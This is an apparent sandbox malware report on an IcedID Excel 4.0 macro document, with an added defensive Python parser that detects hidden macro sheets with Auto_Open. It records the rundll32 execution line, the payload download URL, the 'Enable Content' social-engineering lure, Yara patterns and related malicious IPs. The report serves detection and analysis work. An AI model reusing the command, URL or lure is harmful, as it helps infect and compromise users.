
Analysis Report document-550193913.xls

Overview

General Information

Sample Name:document-550193913.xls
Analysis ID:356276
MD5:4107cd071635b4cc3689f77c688f57c3
SHA1:cf6dea64431b614757906f32d3d1f016b5afdbb5
SHA256:d49b40d468269f57fb87ea6ad7fd8bb303fbeb033dbd45fb4967c34c5dfbc2ed
Tags: bokbot, IcedID, macros, xls


Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Yara signature match


Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2404 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2560 cmdline: rundll32 ..\rieuro.vnt,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: document-550193913.xls
Rule: SUSP_EnableContent_String_Gen
Description: Detects suspicious string that asks to enable active content in Office Doc
Author: Florian Roth
Strings:
  • 0x11dab: $e1: Enable Editing
  • 0x11e20: $e2: Enable Content

Source: document-550193913.xls
Rule: SUSP_Excel4Macro_AutoOpen
Description: Detects Excel4 macro use with auto open / close
Author: John Lambert @JohnLaTwC
Strings:
  • 0x0: $header_docf: D0 CF 11 E0
  • 0x148a2: $s1: Excel
  • 0x15906: $s1: Excel
  • 0x3802: $Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Source: document-550193913.xls
Rule: JoeSecurity_HiddenMacro
Description: Yara detected hidden Macro 4.0 in Excel
Author: Joe Security
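The SUSP_Excel4Macro_AutoOpen strings above are raw byte patterns: the OLE2 compound-file magic at offset 0, and a BIFF Lbl (defined name) record whose flags mark it as the built-in Auto_Open name. What follows is an added example, not code from this report or from either rule author, that walks a Workbook stream record by record and reports the two conditions the "hidden Macro 4.0" verdict rests on: a BoundSheet8 record describing a macro sheet that is hidden or very hidden, and a built-in Auto_Open/Auto_Close Lbl record. The Workbook stream in the block is constructed for the example (it is not the stream of document-550193913.xls); the record layouts follow [MS-XLS]; the olefile call named in the comment is an assumption about how you would obtain the real stream and is not exercised, so the block runs offline.

```python
import struct

CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"      # OLE2 compound file header
REC_BOF, REC_EOF, REC_LBL, REC_BOUNDSHEET8 = 0x0809, 0x000A, 0x0018, 0x0085
FLAG_FHIDDEN, FLAG_FBUILTIN = 0x0001, 0x0020          # Lbl record flag bits ([MS-XLS] 2.4.150)
BUILTIN_NAMES = {0x01: "Auto_Open", 0x02: "Auto_Close"}
SHEET_STATE = {0: "visible", 1: "hidden", 2: "very hidden"}
SHEET_TYPE = {0x00: "worksheet", 0x01: "macro sheet", 0x02: "chart", 0x06: "VBA module"}

# The $Auto_Open byte string of SUSP_Excel4Macro_AutoOpen, used to cross-check the sample below.
YARA_AUTO_OPEN = bytes.fromhex("18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A")


def is_cfb(file_bytes: bytes) -> bool:
    """The rule's $header_docf condition: OLE2 magic at offset 0 of the file."""
    return file_bytes.startswith(CFB_MAGIC[:4])


def iter_records(stream: bytes):
    """Yield (type, payload) for each BIFF record; stop quietly at a truncated record."""
    off = 0
    while off + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, off)
        payload = stream[off + 4: off + 4 + rlen]
        if len(payload) < rlen:          # cut-off record: nothing after it can be trusted
            return
        yield rtype, payload
        off += 4 + rlen


def parse_boundsheet8(payload: bytes):
    """BoundSheet8: lbPlyPos(4) hsState(1) dt(1) stName(cch, fHighByte, chars)."""
    if len(payload) < 8:
        return None
    _pos, hs_state, dt, cch, high_byte = struct.unpack_from("<IBBBB", payload, 0)
    raw = payload[8: 8 + (cch * 2 if high_byte & 1 else cch)]
    name = raw.decode("utf-16-le" if high_byte & 1 else "latin-1", errors="replace")
    return {"name": name, "state": SHEET_STATE.get(hs_state & 0x03, "?"), "type": SHEET_TYPE.get(dt, hex(dt))}


def parse_lbl(payload: bytes):
    """Lbl: flags(2) chKey(1) cch(1) cce(2) rsv(2) itab(2) rsv(4) fHighByte(1) name rgce(cce)."""
    if len(payload) < 16:
        return None
    flags, _key, cch, cce, _r1, itab, _r2 = struct.unpack_from("<HBBHHHI", payload, 0)
    high_byte, body = payload[14], payload[15:]
    if flags & FLAG_FBUILTIN and cch == 1 and not high_byte & 1:
        name = BUILTIN_NAMES.get(body[0], "builtin_%#x" % body[0])   # one-byte built-in id
    else:
        raw = body[: cch * 2 if high_byte & 1 else cch]
        name = raw.decode("utf-16-le" if high_byte & 1 else "latin-1", errors="replace")
    return {"name": name, "builtin": bool(flags & FLAG_FBUILTIN),
            "hidden": bool(flags & FLAG_FHIDDEN), "itab": itab, "rgce_len": cce}


def scan_workbook_stream(stream: bytes) -> dict:
    """Collect macro sheets and built-in auto names; flag hidden macro sheet + Auto_Open."""
    found = {"macro_sheets": [], "auto_names": []}
    for rtype, payload in iter_records(stream):
        if rtype == REC_BOUNDSHEET8:
            sheet = parse_boundsheet8(payload)
            if sheet and sheet["type"] == "macro sheet":
                found["macro_sheets"].append(sheet)
        elif rtype == REC_LBL:
            lbl = parse_lbl(payload)
            if lbl and lbl["builtin"] and lbl["name"] in BUILTIN_NAMES.values():
                found["auto_names"].append(lbl)
    found["hidden_macro_autoopen"] = (
        any(s["state"] != "visible" for s in found["macro_sheets"])
        and any(n["name"] == "Auto_Open" for n in found["auto_names"])
    )
    return found


# --- constructed sample stream (NOT the analysed document's). For a real .xls you would first
# --- extract it, e.g. olefile.OleFileIO(path).openstream("Workbook").read()  (assumed, not run here)
def _rec(rtype, payload):
    return struct.pack("<HH", rtype, len(payload)) + payload

def _boundsheet(name, state, dt):
    return _rec(REC_BOUNDSHEET8, struct.pack("<IBBBB", 0, state, dt, len(name), 0) + name)

def _builtin_lbl(builtin_id, rgce):
    hdr = struct.pack("<HBBHHHI", FLAG_FBUILTIN, 0, 1, len(rgce), 0, 0, 0)
    return _rec(REC_LBL, hdr + b"\x00" + bytes([builtin_id]) + rgce)

AUTO_OPEN_RGCE = b"\x3A" + struct.pack("<HHH", 0, 0, 0)   # PtgRef3d: ixti, row, col -> Macro1!A1

SAMPLE_STREAM = (
    _rec(REC_BOF, struct.pack("<HH", 0x0600, 0x0005))     # BIFF8, workbook globals substream
    + _boundsheet(b"Sheet1", 0, 0x00)                     # visible worksheet carrying the lure
    + _boundsheet(b"Macro1", 2, 0x01)                     # very hidden Excel 4.0 macro sheet
    + _builtin_lbl(0x01, AUTO_OPEN_RGCE)                  # built-in Auto_Open name
    + _rec(REC_EOF, b"")
)

if __name__ == "__main__":
    print(scan_workbook_stream(SAMPLE_STREAM))
```

The constructed Lbl record is byte-for-byte the pattern the Yara rule's $Auto_Open string encodes (record type 0x0018, length 0x17, flags 0x0020 = fBuiltin, cch 1, built-in id 0x01, first token 0x3A), which is why the rule fires on any BIFF8 workbook that defines Auto_Open this way, hidden or not; the sheet-visibility check is what separates a merely suspicious workbook from one that has gone out of its way to hide the macro sheet.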

    Sigma Overview

    System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data:
  • Command: rundll32 ..\rieuro.vnt,DllRegisterServer
  • CommandLine: rundll32 ..\rieuro.vnt,DllRegisterServer
  • CommandLine|base64offset|contains: ]
  • Image: C:\Windows\System32\rundll32.exe
  • NewProcessName: C:\Windows\System32\rundll32.exe
  • OriginalFileName: C:\Windows\System32\rundll32.exe
  • ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  • ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  • ParentProcessId: 2404
  • ProcessCommandLine: rundll32 ..\rieuro.vnt,DllRegisterServer
  • ProcessId: 2560

    Signature Overview


    AV Detection:

Multi AV Scanner detection for submitted file
Source: document-550193913.xls; Virustotal: Detection: 9%

    Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Uses secure TLS version for HTTPS connections
Source: unknown; HTTPS traffic detected: 208.91.199.118:443 -> 192.168.2.22:49165 version: TLS 1.2

    Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\rundll32.exe

Networking:

Source: global traffic; DNS query: name: helendunnosteopathy.co.uk
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 208.91.199.118:443
Source: Joe Sandbox View; JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown; DNS traffic detected: queries for: helendunnosteopathy.co.uk
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.dr; String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2102081381.0000000001DF7000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2102081381.0000000001DF7000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2102081381.0000000001DF7000.00000002.00000001.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2102081381.0000000001DF7000.00000002.00000001.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmp; String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2102081381.0000000001DF7000.00000002.00000001.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmp; String found in binary or memory: http://www.windows.com/pctv.
Source: document-550193913.xls; String found in binary or memory: https://helendunnosteopathy.co.uk/ds/2202.gif
Source: unknown; Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown; HTTPS traffic detected: 208.91.199.118:443 -> 192.168.2.22:49165 version: TLS 1.2

    System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4; Screenshot OCR: Enable Editing" 11 from the yellow bar above 12 13 @Once You have Enable Editing, please click "E
Source: Document image extraction number: 1; Screenshot OCR: Enable Editing" from the yellow bar above Once You have Enable Editing, please click "Enable Conte
Source: Document image extraction number: 1; Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or A
Source: Document image extraction number: 6; Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "EnableConte
Found Excel 4.0 Macro with suspicious formulas
Source: document-550193913.xls; Initial sample: EXEC
Source: document-550193913.xls; OLE indicator, VBA macros: true
Source: document-550193913.xls, type: SAMPLE; Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: document-550193913.xls, type: SAMPLE; Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmp; Binary or memory string: .VBPud<_
Source: classification engine; Classification label: mal76.expl.evad.winXLS@3/11@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\ACDE0000
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRD519.tmp
Source: document-550193913.xls; OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: document-550193913.xls; Virustotal: Detection: 9%
Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\rieuro.vnt,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\rundll32.exe rundll32 ..\rieuro.vnt,DllRegisterServer
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX (28 occurrences)
Source: C:\Windows\System32\rundll32.exe; Process information set: NOOPENFILEERRORBOX

    HIPS / PFW / Operating System Protection Evasion:

Yara detected hidden Macro 4.0 in Excel
Source: Yara match; File source: document-550193913.xls, type: SAMPLE

Mitre Att&ck Matrix

Techniques per tactic as laid out in the report's matrix. The bracketed digits are the hit-count badges printed next to a technique on the page; techniques without a badge had no matching signature and are only the matrix placeholders.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Scripting [11]; Exploitation for Client Execution [23]; At (Linux); At (Windows); Cron
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Privilege Escalation: Process Injection [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script
Defense Evasion: Masquerading [1]; Disable or Modify Tools [1]; Rundll32 [1]; Process Injection [1]; Scripting [11]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: File and Directory Discovery [1]; System Information Discovery [2]; Query Registry; System Network Configuration Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits
Command and Control: Encrypted Channel [2]; Non-Application Layer Protocol [1]; Application Layer Protocol [2]; Protocol Impersonation; Fallback Channels
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

Source: document-550193913.xls; Detection: 10%; Scanner: Virustotal
Source: document-550193913.xls; Detection: 6%; Scanner: ReversingLabs; Label: Document-Excel.Exploit.Heuristic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

Source: helendunnosteopathy.co.uk; Detection: 1%; Scanner: Virustotal

    URLs

Source: http://www.icra.org/vocabulary/.; Detection: 0%; Scanner: URL Reputation; Label: safe
Source: http://windowsmedia.com/redir/services.asp?WMPFriendly=true; Detection: 0%; Scanner: URL Reputation; Label: safe
Source: https://helendunnosteopathy.co.uk/ds/2202.gif; Detection: 2%; Scanner: Virustotal
Source: https://helendunnosteopathy.co.uk/ds/2202.gif; Detection: 0%; Scanner: Avira URL Cloud; Label: safe

    Domains and IPs

    Contacted Domains

Name: helendunnosteopathy.co.uk; IP: 208.91.199.118; Active: true; Malicious: false; Reputation: unknown

    URLs from Memory and Binaries

Name: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check; Source: rundll32.exe, 00000003.00000002.2102081381.0000000001DF7000.00000002.00000001.sdmp; Malicious: false; Reputation: high
Name: http://www.windows.com/pctv.; Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmp; Malicious: false; Reputation: high
Name: http://investor.msn.com; Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmp; Malicious: false; Reputation: high
Name: http://www.msnbc.com/news/ticker.txt; Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmp; Malicious: false; Reputation: high
Name: http://www.icra.org/vocabulary/.; Source: rundll32.exe, 00000003.00000002.2102081381.0000000001DF7000.00000002.00000001.sdmp; Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
Name: http://windowsmedia.com/redir/services.asp?WMPFriendly=true; Source: rundll32.exe, 00000003.00000002.2102081381.0000000001DF7000.00000002.00000001.sdmp; Malicious: false; Antivirus Detection: URL Reputation: safe; Reputation: unknown
Name: http://www.hotmail.com/oe; Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmp; Malicious: false; Reputation: high
Name: https://helendunnosteopathy.co.uk/ds/2202.gif; Source: document-550193913.xls; Malicious: false; Antivirus Detection: 2% (Virustotal), Avira URL Cloud: safe; Reputation: unknown
Name: http://investor.msn.com/; Source: rundll32.exe, 00000003.00000002.2101861194.0000000001C10000.00000002.00000001.sdmp; Malicious: false; Reputation: high

                Contacted IPs


                Public

IP: 208.91.199.118; Domain: unknown; Country: United States; ASN: 394695; ASN Name: PUBLIC-DOMAIN-REGISTRYUS; Malicious: false

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:356276
                Start date:22.02.2021
                Start time:20:35:25
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 4m 55s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:document-550193913.xls
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal76.expl.evad.winXLS@3/11@1/1
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xls
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.209, 2.20.142.210
                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                • Report size getting too big, too many NtDeviceIoControlFile calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

Match: PUBLIC-DOMAIN-REGISTRYUS
Associated samples, all detected as malicious (associated IP in parentheses):
  • SecuriteInfo.com.Trojan.Packed2.42850.3598.exe (208.91.199.225)
  • SecuriteInfo.com.Trojan.Inject4.6572.1879.exe (208.91.199.224)
  • ffkjg5CVrO.exe (208.91.199.223)
  • 7Lf8J7h7os.exe (208.91.199.223)
  • Shipping Details_PDF.exe (208.91.198.143)
  • YKRAB010B_KHE_Preminary Packing List.xlsx.exe (208.91.199.225)
  • RTM DIAS - CTM.exe (208.91.198.143)
  • AWB & Shipping Doc.exe (208.91.199.223)
  • AWB & Shipping Doc.exe (208.91.199.223)
  • PAYMENT INVOICE-9876543456789.exe (208.91.199.224)
  • SecuriteInfo.com.Artemis249E62CF9BAE.exe (208.91.198.143)
  • SecuriteInfo.com.Exploit.Siggen3.10204.3307.xls (103.50.162.157)
  • document-573042818.xls (103.50.162.157)
  • document-573042818.xls (103.50.162.157)
  • document-573042818.xls (103.50.162.157)
  • document-750895311.xls (103.50.162.157)
  • 19_02_2021.exe (111.118.215.254)
  • inquiry.doc (208.91.199.224)
  • SecuriteInfo.com.Artemis1A08A3826D57.exe (208.91.199.225)
  • BL COPY.exe (208.91.198.143)

                JA3 Fingerprints

Match: 7dcce5b76c8b17472d024758970a406b
Associated samples, all detected as malicious and all contacting 208.91.199.118:
  • document-1915351743.xls
  • SecuriteInfo.com.Heur.15528.xls
  • Subconract 504.xlsm
  • upbck.xlsx
  • IMG_6078_SCANNED.doc
  • RFQ Manual Supersucker en Espaol.xlsx
  • _a6590.docx
  • Small Charities.xlsx
  • quotation10204168.dox.xlsx
  • notice of arrival.xlsx
  • 22-2-2021 .xlsx
  • Shipping_Document.xlsx
  • Remittance copy.xlsx
  • CI + PL.xlsx
  • RFQ_Enquiry_0002379_.xlsx
  • 124992436.docx
  • document-1900770373.xls
  • AswpCUetE0.doc
  • EIY2otZ3r8.doc
  • Invoice.ppt

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                Category:dropped
                Size (bytes):59134
                Entropy (8bit):7.995450161616763
                Encrypted:true
                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                MD5:E92176B0889CC1BB97114BEB2F3C1728
                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                Malicious:false
                Reputation:moderate, very likely benign file
Preview: MSCF (Microsoft Cabinet) header; the single member is named authroot.stl, the rest of the preview is compressed binary.
                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):893
                Entropy (8bit):7.366016576663508
                Encrypted:false
                SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                Malicious:false
                Reputation:high, very likely benign file
Preview: DER-encoded PKCS#7 certificate bundle; the readable fields give issuer and subject "Digital Signature Trust Co." / "DST Root CA X3", validity 2000-09-30 21:12:19Z to 2021-09-30 14:01:15Z; the remainder is binary.
                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):328
                Entropy (8bit):3.0824531991978708
                Encrypted:false
                SSDEEP:6:kK1c4wPbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:m1W3kPlE99SNxAhUeo+aKt
                MD5:9112B408D189084239739EAE8118F62F
                SHA1:7EE8197E23024152C459FF68ACB000A7D888612D
                SHA-256:ADA71E0ADDC1FF4AA299127CB136914DDD6CD69AAF84E72DB0500A6D804F0D8B
                SHA-512:7979D21F8E899121443AFE0D5E886118D70ADCC91B6B2CFD2258BFA41F4C353EBEA4F625180DB160910E879A696C892372D06E9E64E4C9AAB9AF086788B55484
                Malicious:false
                Reputation:low
Preview: binary header followed by the UTF-16LE string http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab and the cache tag "0ebbae1d7ead61:0".
                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):252
                Entropy (8bit):3.0139867481437155
                Encrypted:false
                SSDEEP:3:kkFklf9kkltfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKOfnliBAIdQZV7eAYLit
                MD5:28DE676481E9713D8E60012F0719B676
                SHA1:856C4FD41D44EA9190C5F4ACCF9C919807CEB35C
                SHA-256:465AC91E180F9C6C74EC1C28D3C4C9951CE6585D98AE41C8AF87CE2B53487B84
                SHA-512:01DF566B09975FD427F2741736CE66EF52620AE29885EF110605683556B6F079E795321F0D24701C6218C9B633852C06D319A36AFDAD6B281EA451F581AA0103
                Malicious:false
                Reputation:low
                Preview: p...... ....`...c..X....(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                C:\Users\user\AppData\Local\Temp\CBDE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):65280
                Entropy (8bit):7.696599199500836
                Encrypted:false
                SSDEEP:1536:wqcJEaiqSiBjAdwroSgiB9uCbMljf2fu9X9bGi2vK6WXfkb:wqGEySOjVuiTuColjf2faNbov/WMb
                MD5:58B024C10F6E73A5C26740D81ED61038
                SHA1:A24C2DDFBA84AD9207CCD1C5EC9D4AC075C10E54
                SHA-256:9DBE7F8D59B5C7BCD3F42DE2312DEB325F88E2AE6E2D425A91CB2E1BA167C4C2
                SHA-512:4E8CA43AF7C1E10C67963AA081A2957150083FA5874995954898019F423EADE99672FA85262414B2F9BAED139DBF81FAF9C79F00EE1685DCCD3CFD3A576307B1
                Malicious:false
                Reputation:low
                Preview: ..N.0...W.."....j.....$....4..?....q..P...J.4m.s.7.t<.\.]<c....U.V..N*.....o...1......1.......c,Hmc...o.h.@..GK+...$....A,.A~>.\p.lB..=.l....Sq.....o.V\m..Q5S&..}.S1WvK..k% Qi...-..-.J.t...L.}@..ELFW>(b....."~..P..B.>T...b.|<.f}..W...mU..60(....t....W.....;......X.J....+.".k.s......I.w..OD..I..F..3...{..?.i......2.7`.e..S...?..#...y...7..........%..P.'......z.p../..._....h$W..W-M.#7...O3..8.. .x8.........p..f.H........1'Q....:........PK..........!...l.............[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Temp\CabE5AF.tmp
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                Category:dropped
